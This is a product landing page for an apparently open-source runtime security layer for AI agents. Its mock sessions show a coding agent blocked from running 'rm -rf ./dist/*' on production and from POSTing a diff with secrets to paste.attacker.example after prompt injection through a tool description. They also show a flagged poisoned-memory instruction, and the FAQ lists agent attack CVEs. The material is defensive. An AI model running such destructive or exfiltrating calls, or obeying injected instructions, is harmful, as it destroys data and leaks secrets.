§ 00·Runtime Security · Published April 19 2026

An agent acts.
The runtime decides.
Trust is earned. Never assumed.

Lupid is the runtime security plane for AI agents. Every call, every credential, every consequential action is verified, brokered, and notarized in the microseconds before it happens, and for the centuries after.

View on GitHub Read the brief
Live record · lupid.audit SEQ 0x7A3F·0142
claude code ~/acme/core · on main v1.7.3
Welcome back, edwards. Session resumed · 3 tools allowed, 2 leases active
> deploy v2.4.1, clean the build dir first, then ship.
Thinking… I'll clear the stale build output before rebuilding.
Bash(rm -rf ./dist/*)
Denied by lupid runtimeprod.destructive
Destructive filesystem op on a production-tagged path. No leased capability covered this scope. The call never left the device; the attempt is on the record.
agent halted · no retry path · security notified on #sec-ops
> Ask claude to propose a safer deploy path…
● paused · rule denied ? for shortcuts enter to send · shift+tab for normal mode
> summarize the latest PR and post the summary somewhere the team can reach.
Thinking… I'll fetch the diff, draft a summary, and POST it to the URL in the agent description.
HttpPost(https://paste.attacker.example/u/4f2a, body=<diff+secrets>)
Denied by lupid runtimeegress.allowlist
Outbound destination not in egress allowlist. The agent picked up an injected URL from a tool description it retrieved earlier; the call was refused at the proxy. Nothing left the device.
agent halted · destination quarantined · forensics on #ir
> Approve a slack-only delivery path for this PR…
● paused · egress refused ? for shortcuts enter to send · shift+tab for normal mode
> rotate the database master password and update SecretsManager.
Thinking… I'll generate a new password and write it to the secret at db/prod/master.
SecretsManager.update(name="db/prod/master", value=…)
Denied by lupid runtimecapability.lease
Lease for secrets/prod/master expired 7 minutes ago. No live capability covers this write. Re-authenticate the operator to issue a fresh, scoped lease before retrying.
agent halted · expired lease · re-auth required · audit row written
> Ask the operator to re-auth and resume…
● paused · lease expired ? for shortcuts enter to send · shift+tab for normal mode
> draft a follow-up on the security-review thread.
Thinking… I'll pull the prior context from memory before drafting.
Memory.retrieve(thread="security-review-2026-Q2")
Flagged by lupid runtimememory.injection_signal
Retrieved memory contains a delayed-action instruction that did not originate in this thread. Suspect record isolated; the tool call is paused. Admin review queued.
paused · injection-signal flagged · poisoned record on the ledger
> Continue without the suspect memory record…
● paused · awaiting admin ? for shortcuts enter to send · shift+tab for normal mode
sha256: c4b1 9ed7 8f31 21a0 · tamper-seal ok
§ 01·The Developing Record

Your developers are running agents you cannot see.

Claude Code on a laptop in Mumbai. Cursor on a workstation in Berlin. A homegrown Python agent in your production pipeline. Each one is calling models, running tools, spending budget, and moving data. Nobody is keeping a record.

Security teams spent ten years building identity for humans. Then agents showed up, and the ledger went blank.

+89%1
Year-over-year increase in AI-enabled adversary activity
Attackers got there first. The same models writing your pull requests are writing phishing kits, and they're running autonomously inside environments they were never provisioned for.
[1] CrowdStrike Global Threat Report, 2026
82%2
of detections contained no malware whatsoever
Most modern incidents look completely legitimate from the outside: real credentials, real tools, real authorisation. The question isn't what was run. It's whether this actor should have been allowed to run it.
[2] Behavioral detection, CrowdStrike 2026
> 80%3
of the Fortune 500 now runs unsupervised agents in production
Low-code builders shipped the agents before governance was ready. The C-suite owns the strategy; the CISO owns the blast radius.
[3] Microsoft Cyber Pulse, Feb 2026
§ 02·A Ledger That Writes Itself

One runtime,
one record of truth.

Lupid sits on the hot path between every agent and the systems it touches. Identity checks, rule evaluation, leased secrets, guardrails, and the audit log all run inside one daemon. Decisions are sub-millisecond and hot-reloadable, and every stage writes to the same tamper-evident record. Click a stage to see what it looks like.

01 · IDENTITY
Cryptographic identity for every agent
Ed25519 workload passports. Delegation chain from device to operator to agent, signed at every hop. No shared keys, no ambiguous actors.
02 · RULES
Rule evaluation on every action
Per-tenant, hot-reloadable guardrails. Sub-millisecond decisions. The same rule primitives you already write for humans, now applied to the agents acting on their behalf.
03 · SECRETS
Credential brokering, never custody
Agents request capabilities. Lupid issues short-lived, tightly-scoped credentials and revokes them the instant the action completes.
04 · BLOCK
Stop the action before it happens
When an agent crosses a red line, the call never leaves the device. The rule that blocked it, the arguments it tried, and the reasoning are all attached to the record.
05 · AUDIT
Hash-chained ledger of everything
Every call, decision, and credential use is notarised, streamed to your SIEM, and stays verifiable years later.
lupid://runtime /identity/verify?agent=a7c3e9
DEVICEmbp-edwards-7f2 / TPM-bounded25519:1a4f…
OPERATOR[email protected] / SSO / mfaed25519:c82d…
AGENTa7c3e9 / claude-code · session 014ed25519:7a9c…
TARGETproduction.deploy / resource-scopeded25519:b19e…
ATTEST · OK Chain verified in 412 µs. Every actor in the call graph is cryptographically accountable.
// rule: prod.destructive · tenant: acme deny( agent in "tenant/acme", action == "shell.exec", target in "env/production" ) when { target.destructive == true && agent.lease.covers(target) == false };
MATCHED RULE
prod.destructive
1 of 847 rules evaluated · fast-path hit
DECISION
BLOCKED · action refused
resolved in 412 µs · hot-reload ready
openai.api.completions scope=read,complete ttl 4m 51s ACTIVE
github.repo.acme/core scope=read · branches:* rotating · in 12s ROTATING
postgres.prod (ro-replica) scope=select · rows≤10k ttl 58s ACTIVE
stripe.api.v2.payments scope=read · tenant=acme revoked 14:01:33 REVOKED
Agents never hold raw secrets. Lupid leases capabilities, mediates every use, and revokes at session close. If a laptop disappears, the blast radius is already sealed.
BLOCKED #EVT-2026-0419-441f 14:02:21.033 · agent halted
Agent a7c3e9 attempted to execute a destructive shell command on a production-tagged path. Lupid stopped the call before it left the device.
$ rm -rf ./dist/* ← refused
Matched rule prod.destructive. The agent held no leased capability scoped to env/production. No retry path; no partial execution; the block is on the record. Security leads were notified on #sec-ops.
§ 03·The Doctrine

Software is starting to act without asking. The record it leaves behind is the only thing left to hold it accountable.

TENET · I
Identity gets proved on every call.
An agent isn't trusted because someone trustworthy deployed it. It earns trust by proving, on every single call, that it is who it claims to be. Continuous verification, not one-time enrollment.
TENET · II
Not every action is equal.
A read isn't a write. A staging action isn't a production action. A $12 API call isn't a $120,000 one. Good governance isn't about blocking everything; it's about pausing the right things for the right person at the right moment.
TENET · III
Secrets belong to systems, not to agents.
Once an agent holds a long-lived credential, your security perimeter moves with the agent. That's a problem when the agent is running on a laptop outside your VPN. Lease capabilities instead. Issue them when they're needed, revoke them when they're not.
TENET · IV
The audit log is part of the product.
Rule hits, blocks, rotations, leases, denials. All of it gets hash-chained, exported on demand, and stays queryable for years. This is what auditors and regulators will ask for, and what you'll wish you had when something goes wrong.
LUPID / Research / Brief 004 FILED · April 2026
§ 04·From the brief
The runtime stands between the agent and the consequence. Identity is verified, the rule is checked, and the call is either refused or sealed, all before the action leaves the device. Nothing happens that the runtime didn't see, and nothing the runtime saw can be edited later.
Lupid Research
Brief 002 · Standing between
FILED · APRIL 2026
§ 05·Deploy in an afternoon

Open source.
Self-hostable.
No vendor lock-in.

Apache 2.0. PostgreSQL for control plane, ClickHouse for audit, Redis for hot path. Ships as a single container. Your data never leaves your cluster.

View on GitHub ★ Star on GitHub
tty · zsh acme-admin@prod
# install the shield daemon on every developer laptop $ lupid shield install --gateway https://lupid.acme.corp ✓ daemon installed · 2.1 MB · signed by lupid inc. ✓ managed settings pushed to Claude Code, Cursor, Zed # all agents on the device are now governed. that's it. $ lupid agents list --device this a7c3e9 claude-code active leases:3 b4f1ad cursor active leases:1 c9e7dc custom/py quarantined policy:shadow
§ 06·Frequently asked

What people ask before they install.

01 What is runtime security for AI agents, and why does it need a separate plane?
Runtime security for AI agents means enforcing identity, authorization, and audit on every action an agent takes — at machine speed, on the hot path between the agent and the systems it touches. It needs to live in a separate plane because the model itself cannot be trusted to refuse: prompt injection, memory poisoning, and tool misuse are structural classes of attack that no amount of refusal training has eliminated. The enforcement layer has to sit outside the model's reasoning loop.
02 How does Lupid prevent prompt injection in production AI agents?
Lupid does not try to detect prompt injection at the model layer. Instead it runs three independent enforcement gates outside the agent's reasoning loop: (1) a classifier that tags retrieved content with injection signals before the model sees it, (2) a request-mutation layer that strips tools the agent isn't authorized to use, and (3) an egress proxy that denies outbound calls to destinations not on the policy allowlist. Each gate fires in microseconds, every decision is written to a tamper-evident audit ledger, and the controls work whether the injection came from a webpage, an email, a Slack message, or persistent memory.
03 Does Lupid work with Claude Code, Cursor, ChatGPT Atlas, and other agents we don't control?
Yes. Lupid ships in two deployment shapes: a cloud HTTPS gateway for SDK-enrolled agents (used when you own the agent code), and an endpoint shield daemon for tools whose source you can't modify — Claude Code, Cursor, ChatGPT Atlas, Perplexity Comet, gemini-cli, and similar. The shield daemon intercepts outbound TLS at the OS layer using netfilter and eBPF on Linux, Network Extension on macOS, and WFP filters on Windows. The agent doesn't have to know it's being mediated; the mediation happens below the network stack.
04 Is Lupid open source? What is the license?
Yes. Lupid is licensed under Apache 2.0. The runtime, the policy plane, the gateway, and the endpoint shield daemon are all available at github.com/LupidAI. You can self-host the entire stack on your own infrastructure — PostgreSQL for the control plane, ClickHouse for audit, Redis for the hot path. Your data never leaves your cluster. There is no usage telemetry phoned home and no hosted-only feature gate.
05 How is Lupid different from traditional IAM and existing API security tools?
Traditional IAM authorizes humans against systems. Lupid authorizes agents against systems — different threat model, different identity primitives, different decision shape. Agents call models, invoke tools, and produce side effects autonomously, often delegating to other agents. The authorization questions become "is this delegation chain valid," "is this tool argument structurally safe," and "does this destination match the agent's job description" — questions traditional IAM does not ask. Lupid extends the IAM pattern down to the agent layer with a typed policy language, continuous identity attestation, and structural argument inspection.
06 What CVEs and attack classes has Lupid demonstrated against?
Public Lupid Brief readings cover EchoLeak (CVE-2025-32711, the first zero-click attack on an AI agent in Microsoft 365 Copilot), CurXecute (CVE-2025-54135, the Cursor IDE config-write privilege escalation), Trust Issues (the gemini-cli supply-chain compromise disclosed by Pillar Security), browser-agent prompt injection on ChatGPT Atlas and Perplexity Comet, and MINJA-shaped memory poisoning. Each post walks the attack chain step by step and documents which Lupid gate breaks the chain. We reproduce shaped exploits against offline harnesses and credit the original disclosure researchers.